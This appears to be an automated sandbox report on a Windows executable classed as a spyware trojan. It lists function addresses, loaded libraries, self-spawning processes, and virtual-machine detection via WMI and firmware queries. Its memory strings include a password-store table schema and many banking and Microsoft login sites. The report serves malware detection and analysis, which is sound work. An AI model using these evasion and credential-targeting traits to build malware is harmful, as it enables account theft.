Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00403940	5_2_00403940
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00419970	5_2_00419970
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0042C176	5_2_0042C176
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00439900	5_2_00439900
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00405910	5_2_00405910
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00430917	5_2_00430917
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004169C0	5_2_004169C0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004239C0	5_2_004239C0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004291C7	5_2_004291C7
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0041D9D0	5_2_0041D9D0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004331D0	5_2_004331D0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00427190	5_2_00427190
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00417A7E	5_2_00417A7E
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004260DD	5_2_004260DD
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0042DA08	5_2_0042DA08
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004082C0	5_2_004082C0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00439AC2	5_2_00439AC2
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004062D0	5_2_004062D0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004042F0	5_2_004042F0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00436AF0	5_2_00436AF0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004402F0	5_2_004402F0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00439280	5_2_00439280
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00431290	5_2_00431290
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0040AAA0	5_2_0040AAA0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043F2B0	5_2_0043F2B0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00422B52	5_2_00422B52
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00422B70	5_2_00422B70
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00437B70	5_2_00437B70
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043F3D0	5_2_0043F3D0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00427BEA	5_2_00427BEA
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043F3EB	5_2_0043F3EB
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043F3E9	5_2_0043F3E9
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00402B80	5_2_00402B80
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00421B90	5_2_00421B90
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0042B3A0	5_2_0042B3A0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00433440	5_2_00433440
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043EC6B	5_2_0043EC6B
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0042546B	5_2_0042546B
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0042EC18	5_2_0042EC18
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00404C20	5_2_00404C20
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00423C26	5_2_00423C26
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00428C9B	5_2_00428C9B
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0041D4A0	5_2_0041D4A0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00407540	5_2_00407540
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00425D70	5_2_00425D70
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0041850C	5_2_0041850C
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00428513	5_2_00428513
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00430D16	5_2_00430D16
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043C520	5_2_0043C520
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043652F	5_2_0043652F
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043F530	5_2_0043F530
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0041CDC0	5_2_0041CDC0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00415DC6	5_2_00415DC6
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004095D0	5_2_004095D0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00437DD0	5_2_00437DD0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0042BDB3	5_2_0042BDB3
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043F5B0	5_2_0043F5B0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043F650	5_2_0043F650
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00416600	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00417E2E	5_2_00417E2E
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00429E35	5_2_00429E35
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0042AED0	5_2_0042AED0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00402F40	5_2_00402F40
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00406760	5_2_00406760
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00417707	5_2_00417707
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00423720	5_2_00423720
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00405F30	5_2_00405F30
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0041D7C0	5_2_0041D7C0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00416600	5_2_00416600
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00432F80	5_2_00432F80
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_00410FAE	5_2_00410FAE
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043FFB0	5_2_0043FFB0

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: String function: 00B7FAE4 appears 34 times
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: String function: 004080D0 appears 52 times
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: String function: 00B7FA60 appears 100 times
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: String function: 00B8CFD6 appears 40 times
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: String function: 00B880F8 appears 42 times
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: String function: 00B80730 appears 38 times
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: String function: 00414050 appears 67 times

Source: 0x001f00000004676d-1858.exe

Static PE information: invalid certificate

Source: 0x001f00000004676d-1858.exe, 00000000.00000000.2025021684.0000000000BFE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs 0x001f00000004676d-1858.exe
Source: 0x001f00000004676d-1858.exe, 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs 0x001f00000004676d-1858.exe
Source: 0x001f00000004676d-1858.exe, 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs 0x001f00000004676d-1858.exe
Source: 0x001f00000004676d-1858.exe, 00000004.00000002.2032846650.0000000000BFE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs 0x001f00000004676d-1858.exe
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2033556645.0000000002F12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs 0x001f00000004676d-1858.exe
Source: 0x001f00000004676d-1858.exe, 00000005.00000002.3283627931.0000000000BFE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs 0x001f00000004676d-1858.exe
Source: 0x001f00000004676d-1858.exe	Binary or memory string: OriginalFilenameMuiUnattend.exej% vs 0x001f00000004676d-1858.exe

Source: 0x001f00000004676d-1858.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0x001f00000004676d-1858.exe

Static PE information: Section: .bss ZLIB complexity 1.0003260588842975

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/1@2/2

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Code function: 5_2_00438760 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

5_2_00438760

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03

Source: 0x001f00000004676d-1858.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2514951560.00000000057DC000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2514417020.00000000057F7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

File read: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0x001f00000004676d-1858.exe "C:\Users\user\Desktop\0x001f00000004676d-1858.exe"
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Process created: C:\Users\user\Desktop\0x001f00000004676d-1858.exe "C:\Users\user\Desktop\0x001f00000004676d-1858.exe"
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Process created: C:\Users\user\Desktop\0x001f00000004676d-1858.exe "C:\Users\user\Desktop\0x001f00000004676d-1858.exe"
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Process created: C:\Users\user\Desktop\0x001f00000004676d-1858.exe "C:\Users\user\Desktop\0x001f00000004676d-1858.exe"
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Process created: C:\Users\user\Desktop\0x001f00000004676d-1858.exe "C:\Users\user\Desktop\0x001f00000004676d-1858.exe"	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Process created: C:\Users\user\Desktop\0x001f00000004676d-1858.exe "C:\Users\user\Desktop\0x001f00000004676d-1858.exe"	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Process created: C:\Users\user\Desktop\0x001f00000004676d-1858.exe "C:\Users\user\Desktop\0x001f00000004676d-1858.exe"	Jump to behavior

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: 0x001f00000004676d-1858.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 0x001f00000004676d-1858.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 0x001f00000004676d-1858.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 0x001f00000004676d-1858.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 0x001f00000004676d-1858.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: 0x001f00000004676d-1858.exe

Static PE information: real checksum: 0x9570b should be: 0x8f7fb

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B7FB83 push ecx; ret	0_2_00B7FB96
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B7FB83 push ecx; ret	3_2_00B7FB96
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043C040 push eax; mov dword ptr [esp], F6F7F0F1h	5_2_0043C04F
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_0043F250 push eax; mov dword ptr [esp], EEE9E8BBh	5_2_0043F252
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 5_2_004465A4 push edi; retf 0041h	5_2_004465A5

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Window / User API: threadDelayed 3727

Jump to behavior

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-20905

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe TID: 984	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe TID: 6844	Thread sleep count: 3727 > 30			Jump to behavior

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B91FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00B91FE9
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B91F38 FindFirstFileExW,	0_2_00B91F38
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B91FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00B91FE9
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B91F38 FindFirstFileExW,	3_2_00B91F38

Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2537887023.0000000005874000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2615557186.000000000319A000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2513058457.000000000319A000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2587726023.00000000031A3000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2513297201.00000000031A3000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.3279346956.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.3279189889.000000000319A000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2615711054.00000000031A3000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000002.3283857019.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2657473252.000000000319A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 0x001f00000004676d-1858.exe, 00000005.00000002.3283727440.000000000316C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx*
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2537887023.0000000005874000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2538037024.000000000580C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

API call chain: ExitProcess graph end node

graph_5-14183

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Code function: 5_2_0043D970 LdrInitializeThunk,

5_2_0043D970

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Code function: 0_2_00B7F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00B7F8E9

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00BAA19E mov edi, dword ptr fs:[00000030h]	0_2_00BAA19E
